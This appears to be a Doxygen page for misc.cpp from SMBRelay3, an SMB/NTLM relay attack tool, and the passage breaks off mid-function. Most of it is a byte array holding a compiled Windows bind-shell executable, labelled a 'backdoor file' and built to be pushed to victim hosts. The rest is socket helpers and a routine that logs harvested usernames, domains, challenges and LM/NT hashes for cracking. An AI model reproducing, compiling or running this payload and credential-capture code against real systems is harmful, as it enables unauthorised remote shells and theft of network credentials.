C:/Web/smbrelay3/src/misc.cpp

Go to the documentation of this file.
00001 /*
00002  Misc data manipulation functions for Smbrelay
00003  Andres Tarasco
00004 */
00005 #include "misc.h"
00006 #include "smbrelay.h"
00007 
00008 extern int verbose;
00009 void DumpMem(void* string, int length) {
00010 
00011         unsigned char *p = (unsigned char *) string;
00012         unsigned char lastrow_data[16];
00013         int rows = length / DBG_DUMP_ROWS;
00014         int lastrow = length % DBG_DUMP_ROWS;
00015         int i, j;
00016     //int k = DBG_DUMP_ROWS - lastrow ;
00017 
00018         for (i = 0; i < rows; i++) {
00019                 printf("%04hx: ", i * 16);
00020                 for (j = 0; j < DBG_DUMP_ROWS; j++) {
00021                         printf("%02x ", p[(i * 16) + j]);
00022                         if ( j==7 ){
00023                                 printf(" ");
00024                         }
00025                 }
00026                 printf(" [ ");
00027                 for (j = 0; j < DBG_DUMP_ROWS; j++) {
00028                         if (isprint(p[(i * 16) + j]))
00029                                 printf("%c", p[(i * 16) + j]);
00030                         else
00031                                 printf(".");
00032                 }
00033                 printf(" ]\n");
00034         }
00035         if (lastrow > 0) {
00036                 memset(lastrow_data, 0, sizeof(lastrow_data));
00037                 memcpy(lastrow_data, p + length - lastrow, lastrow);
00038                 printf("%04hx: ", i * 16);
00039                 for (j = 0; j < lastrow; j++) {
00040                         printf("%02x ", p[(i * 16) + j]);
00041                         if ( (j % 8 == 1) && (j!=1) )
00042                                 printf(" ");
00043                 }
00044                 while(j < DBG_DUMP_ROWS) {
00045                         printf("   ");
00046                         if (j % 8 == 1)
00047                                 printf(" ");
00048                         j++;
00049                 }
00050         //while (k!=0) { --k; printf("   "); }
00051                 printf(" [ ");
00052                 for (j = 0; j < lastrow; j++) {
00053                         if (isprint(p[(i * 16) + j]))
00054                                 printf("%c", p[(i * 16) + j]);
00055                         else
00056                                 printf(".");
00057                 }
00058                 while(j < DBG_DUMP_ROWS) {
00059                         printf(" ");
00060                         j++;
00061                 }
00062         //k = DBG_DUMP_ROWS - lastrow ;
00063         //while (k!=0) { --k; printf(" "); }
00064                 printf(" ]\n");
00065         }
00066         printf("\n");
00067 
00068 }
00069 
00070 
00071 
00072 
00073 char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile)
00074 {
00075         unsigned char SMRS[2048] = { // Smbrelay Shell Service ( 2kb BindShell )
00076         0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 
00077         0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00078         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00079         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00, 
00080         0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 
00081         0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, 
00082         0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20, 
00083         0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00084         0x2F, 0xB0, 0x55, 0xC4, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97, 
00085         0x4C, 0x17, 0x46, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3A, 0x97, 0x6C, 0xD1, 0x3B, 0x97, 
00086         0xA8, 0xDE, 0x66, 0x97, 0x6E, 0xD1, 0x3B, 0x97, 0x4C, 0x17, 0x55, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 
00087         0x4C, 0x17, 0x43, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xD1, 0x3B, 0x97, 
00088         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00089         0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x02, 0x00, 0x3E, 0x48, 0xFF, 0x47, 0x00, 0x00, 0x00, 0x00, 
00090         0x00, 0x00, 0x00, 0x00, 0xE0, 0x00, 0x03, 0x01, 0x0B, 0x01, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 
00091         0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 
00092         0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 
00093         0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00094         0x00, 0x30, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04, 
00095         0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 
00096         0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00097         0x5C, 0x20, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00098         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00099         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00100         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00101         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00102         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 
00103         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00104         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 
00105         0x4B, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 
00106         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60, 
00107         0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 
00108         0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00109         0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00110         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00111         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00112         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00113         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00114         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00115         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00116         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00117         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00118         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00119         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00120         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00121         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00122         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00123         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00124         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00125         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00126         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00127         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00128         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00129         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00130         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00131         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00132         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00133         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00134         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00135         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00136         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00137         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00138         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00139         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00140         0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xF4, 0x01, 0x00, 0x00, 0x53, 0x56, 0x57, 0x8D, 0x85, 0x0C, 0xFE, 
00141         0xFF, 0xFF, 0x50, 0x68, 0x01, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x10, 0x20, 0x40, 0x00, 0x33, 0xF6, 
00142         0x56, 0x56, 0x56, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x15, 0x0C, 0x20, 0x40, 0x00, 0x8B, 
00143         0xF8, 0x6A, 0x10, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0x66, 0xC7, 0x45, 0xF0, 0x02, 0x00, 0x66, 0xC7, 
00144         0x45, 0xF2, 0x1F, 0x90, 0x89, 0x75, 0xF4, 0xFF, 0x15, 0x08, 0x20, 0x40, 0x00, 0x6A, 0x01, 0x57, 
00145         0xFF, 0x15, 0x14, 0x20, 0x40, 0x00, 0x56, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0xFF, 0x15, 0x18, 0x20, 
00146         0x40, 0x00, 0x56, 0xBB, 0x28, 0x20, 0x40, 0x00, 0x53, 0x8B, 0xF8, 0xE8, 0x50, 0x00, 0x00, 0x00, 
00147         0x59, 0x50, 0x53, 0x57, 0xFF, 0x15, 0x1C, 0x20, 0x40, 0x00, 0x8D, 0x45, 0x9C, 0x50, 0x8D, 0x45, 
00148         0xAC, 0x50, 0x56, 0x56, 0x56, 0x6A, 0x01, 0x56, 0x56, 0x68, 0x24, 0x20, 0x40, 0x00, 0x56, 0xC7, 
00149         0x45, 0xAC, 0x44, 0x00, 0x00, 0x00, 0x66, 0x89, 0x75, 0xDC, 0xC7, 0x45, 0xD8, 0x01, 0x01, 0x00, 
00150         0x00, 0x89, 0x7D, 0xEC, 0x89, 0x7D, 0xE8, 0x89, 0x7D, 0xE4, 0x89, 0x75, 0xB8, 0x89, 0x75, 0xB4, 
00151         0x89, 0x75, 0xE0, 0xFF, 0x15, 0x00, 0x20, 0x40, 0x00, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x10, 0x00, 
00152         0x8B, 0x4C, 0x24, 0x04, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8A, 0x01, 0x83, 0xC1, 
00153         0x01, 0x84, 0xC0, 0x74, 0x4E, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x75, 0xEF, 0x05, 0x00, 0x00, 
00154         0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00, 
00155         0x8B, 0x01, 0xBA, 0xFF, 0xFE, 0xFE, 0x7E, 0x03, 0xD0, 0x83, 0xF0, 0xFF, 0x33, 0xC2, 0x83, 0xC1, 
00156         0x04, 0xA9, 0x00, 0x01, 0x01, 0x81, 0x74, 0xE8, 0x8B, 0x41, 0xFC, 0x84, 0xC0, 0x74, 0x32, 0x84, 
00157         0xE4, 0x74, 0x24, 0xA9, 0x00, 0x00, 0xFF, 0x00, 0x74, 0x13, 0xA9, 0x00, 0x00, 0x00, 0xFF, 0x74, 
00158         0x02, 0xEB, 0xCD, 0x8D, 0x41, 0xFF, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFE, 
00159         0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFD, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 
00160         0xC3, 0x8D, 0x41, 0xFC, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00, 
00161         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00162         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00163         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00164         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00165         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00166         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00167         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00168         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00169         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00170         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00171         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00172         0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00, 
00173         0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80, 
00174         0x00, 0x00, 0x00, 0x00, 0x63, 0x6D, 0x64, 0x00, 0x53, 0x6D, 0x62, 0x52, 0x65, 0x6C, 0x61, 0x79, 
00175         0x33, 0x20, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20, 
00176         0x2D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x74, 0x61, 0x72, 
00177         0x61, 0x73, 0x63, 0x6F, 0x2E, 0x6F, 0x72, 0x67, 0x20, 0x0A, 0x0A, 0x00, 0xA0, 0x20, 0x00, 0x00, 
00178         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x20, 0x00, 0x00, 0x08, 0x20, 0x00, 0x00, 
00179         0x98, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x20, 0x00, 0x00, 
00180         0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00181         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00182         0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00, 0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80, 
00183         0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x57, 0x53, 
00184         0x41, 0x53, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x41, 0x00, 0x00, 0x57, 0x53, 0x32, 0x5F, 0x33, 0x32, 
00185         0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x66, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 
00186         0x6F, 0x63, 0x65, 0x73, 0x73, 0x41, 0x00, 0x00, 0x4B, 0x45, 0x52, 0x4E, 0x45, 0x4C, 0x33, 0x32, 
00187         0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00188         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00189         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00190         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00191         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00192         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00193         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00194         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00195         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00196         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00197         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00198         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00199         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00200         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00201         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00202         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
00203         0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
00204 };
00205         FILE *fp=fopen(lpBackdoorFile,"rb");
00206         char *buffer;
00207     int len;
00208         if (!fp) {
00209                 printf("[-] %s not found. using cached version\n",lpBackdoorFile);
00210                 buffer=(char *)malloc(sizeof(SMRS));
00211                 memcpy(buffer,SMRS,sizeof(SMRS));
00212                 return(buffer);
00213         }
00214         fseek(fp,0,SEEK_END);
00215     len=ftell(fp);
00216         *BackdoorFileSize=len;
00217         fseek(fp,0,SEEK_SET);
00218         buffer=(char*)malloc(len);
00219         fread(buffer,len,1,fp);
00220         fclose(fp);
00221         return(buffer);
00222 }
00223 
00224 
00225 int ConnectToRemoteHost(RELAY *relay,char *hostname, int port)
00226 {
00227         #ifdef WIN32
00228                 u_long tmp=1;
00229         #else
00230                 int tmp=1;
00231         #endif
00232         fd_set fds;
00233         struct timeval tv;
00234         struct hostent *hostend;
00235         int i;
00236 
00237         relay->destinationaddr.sin_family = AF_INET;
00238         relay->destinationaddr.sin_addr.s_addr = inet_addr(hostname);
00239         if (relay->destinationaddr.sin_addr.s_addr == INADDR_NONE)
00240         {
00241                 hostend=gethostbyname(hostname);
00242                 if (!hostend) 
00243                 {
00244                         return(0);
00245                 }
00246                 memcpy(&relay->destinationaddr.sin_addr.s_addr, hostend->h_addr, 4);                    
00247         printf("[+] Remote Server %s  resolved as %s\n",hostname,inet_ntoa(relay->destinationaddr.sin_addr));
00248         }       
00249         strcpy(relay->hostname,hostname);
00250         relay->destinationaddr.sin_port = htons(port); //445      
00251         relay->destination=socket(AF_INET, SOCK_STREAM, 0);
00252 
00253         #ifdef WIN32
00254         ioctlsocket(relay->destination, FIONBIO, &tmp);
00255 #else
00256         ioctl(relay->destination, FIONBIO, (char *)&tmp);
00257 #endif
00258         tv.tv_sec = CONNECT_TIMEOUT;
00259         tv.tv_usec = 0;
00260         FD_ZERO(&fds);
00261         FD_SET(relay->destination, &fds);
00262 
00263 
00264         connect(relay->destination,(struct sockaddr *)&relay->destinationaddr, sizeof(relay->destinationaddr));
00265         i=select((int)relay->destination+1,0,&fds,0,&tv);
00266         if (i<=0){
00267                 printf("[-] Error - Connection against %s:%i Failed\n",hostname,port);
00268         return(0);
00269         }
00270         tmp=0;
00271         #ifdef WIN32
00272         ioctlsocket( relay->destination, FIONBIO, &tmp);
00273 #else
00274         ioctl(relay->destination, FIONBIO, (char *)&tmp);
00275 #endif
00276         return(1);
00277 }
00278 
00279 
00280 int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout)
00281 {
00282         int i=-1;
00283         #ifdef WIN32
00284                 u_long tmp=1;
00285         #else
00286                 int tmp=1;
00287         #endif
00288         fd_set fds;
00289         struct timeval tv;
00290 
00291         if (debug) {
00292                 printf("Sending..\n");
00293                 DumpMem(source,nBytes);
00294         }
00295 
00296 //    if (send(destination, source, nBytes,0) >0) {
00297                 if (timeout>0) 
00298                 {
00299                         #ifdef WIN32
00300                         ioctlsocket(destination, FIONBIO, &tmp);
00301                         #else
00302                         ioctl(destination, FIONBIO, (char *)&tmp);
00303                         #endif
00304             send(destination, source, nBytes,0);
00305                         tv.tv_sec = timeout;
00306                         tv.tv_usec = 0;
00307                         FD_ZERO(&fds);
00308                         FD_SET(destination, &fds);
00309             //printf("Esperando Timeout: %i\n",timeout);
00310             i=select((int)destination+1,&fds,0,0,&tv);
00311             //printf("saliendo select: %i\n",i);
00312                         if (i<=0) return(-1);
00313         } else {
00314             send(destination, source, nBytes,0);
00315         }
00316                 i=recv(destination, (char *)destinationBuffer, MaxReadSize, 0);
00317                 if (timeout>0) 
00318                 {
00319                         tmp=0;
00320                         #ifdef WIN32
00321                         ioctlsocket(destination, FIONBIO, &tmp);
00322                         #else
00323                         ioctl(destination, FIONBIO, (char *)&tmp);
00324                         #endif
00325                 }
00326                 if (debug)
00327                 {
00328                         printf("[*] received: %i bytes\n",i);
00329                         DumpMem(destinationBuffer,i);
00330                 }
00331 //      }
00332     //printf("salimos...: %i\n",i);
00333         return(i);
00334 }
00335 
00336 void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge)
00337 {
00338         char buffer[1024];
00339         char tmp[256];
00340         FILE *LogFile=NULL;
00341         char UserName[256];
00342         char Domain[256];
00343         char Workstation[256];
00344         unsigned char *p;
00345         int i;
00346 
00347                 
00348         LogFile=fopen(lpLogFileFilename,"a+");
00349         strcpy(tmp,"#SOURCEIPADDRESS:DOMAIN:WORKSTATION:USERNAME:challenge:LMHASH:NTLMHASH\n");
00350         fwrite(tmp,strlen(tmp),1,LogFile);
00351         
00352         GetNTLMPacketInfo(NtlmAuthResponse,(char*)&UserName, (char*)&Domain, (char*)&Workstation,0);
00353         sprintf(buffer,"%s:%s:%s:%s:",SourceIpAddress,Domain,Workstation,UserName);
00354                 //Challenge:
00355                 sprintf(tmp,"%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x:",challenge[0],challenge[1],challenge[2],challenge[3],challenge[4],challenge[5],challenge[6],challenge[7]);
00356                 strcat(buffer,tmp);
00357                 //LM HASH               
00358                 p=(unsigned char *)NtlmAuthResponse + NtlmAuthResponse->lmResponse.offset;
00359                 //printf("LM\n");
00360                 //DumpMem(p,24);
00361                 for(i=0;i<24;i++) {sprintf(tmp,"%2.2x",p[i]); strcat(buffer,tmp); }
00362                 strcat(buffer,":");
00363                 //NT HASH               
00364                 p=(unsigned char *)NtlmAuthResponse + NtlmAuthResponse->ntResponse.offset;
